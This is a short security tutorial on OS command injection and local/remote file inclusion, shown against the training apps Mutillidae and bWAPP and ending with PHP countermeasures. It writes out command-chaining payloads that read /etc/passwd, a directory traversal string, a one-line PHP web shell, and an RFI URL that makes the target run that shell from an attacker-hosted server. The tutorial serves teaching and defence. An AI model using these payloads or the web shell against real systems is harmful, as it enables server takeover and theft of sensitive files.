Command Injection & RFI/LFI

Feb 1, 2022

A practical guide on exploiting and mitigating critical server-level vulnerabilities: OS Command Injection and Local/Remote File Inclusion (LFI/RFI). These flaws allow an attacker to execute arbitrary code or read sensitive files from the host operating system.

1. OS Command Injection

This vulnerability occurs when a web application passes unsafe user-supplied data directly to a system shell (using functions like exec() or system()). Attackers can alter execution using shell "metacharacters" to chain malicious commands.

Magic Operators

; (Semicolon): Executes commands sequentially.
&& (Logical AND): Executes the second command only if the first succeeds.
| (Pipe): Passes the output of the first command as input to the second.

Accessing OWASP Mutillidae, we can test basic reconnaissance payloads:

# Ignore the ping and list the current directory
127.0.0.1 ; pwd
127.0.0.1 | ls -la

# Read the critical Linux user file
127.0.0.1 ; cat /etc/passwd

2. LFI / RFI (Local & Remote File Inclusion)

Occurs when an app dynamically includes files using URL parameters without proper validation. Attackers can inject OS paths to read private files.

LFI and Directory Traversal

We use the vulnerable parameter in bWAPP to navigate backward in the server's directories using ../ to reach the system root:

# Escape /var/www/html and read system files
?language=../../../../etc/passwd

RFI and Bindshells

If PHP's allow_url_include=On is set, the risk is critical: we can force the server to include and execute a file hosted on our malicious server.

# 1. Host shell.txt on Kali:
<?php system($_GET['cmd']); ?>

# 2. Force the victim server to execute it:
http://target/bWAPP/rlfi.php?language=http://kali-ip/shell.txt&cmd=whoami

🔴 New Sandbox Available!

I've prepared a Network Emulator (Ping Tool) that is vulnerable to Command Injection. Will you be able to chain a payload to read the /etc/passwd file from my simulated server?

>_ START CTF 02 CHALLENGE

3. Countermeasures

For Command Injection:

Avoid OS calls. Use built-in PHP functions (e.g., unlink() instead of rm).
Strict Validation. Use native filters like filter_var($ip, FILTER_VALIDATE_IP).
Escape Arguments. If shell usage is strictly necessary, use escapeshellarg().

For LFI/RFI:

<?php
// Robust defense against LFI using a Whitelist Map
$allowed_files = ['es' => 'es_lang.php', 'en' => 'en_lang.php'];
$selection = $_GET['lang'] ?? 'es';
include($allowed_files[$selection] ?? $allowed_files['es']);
?>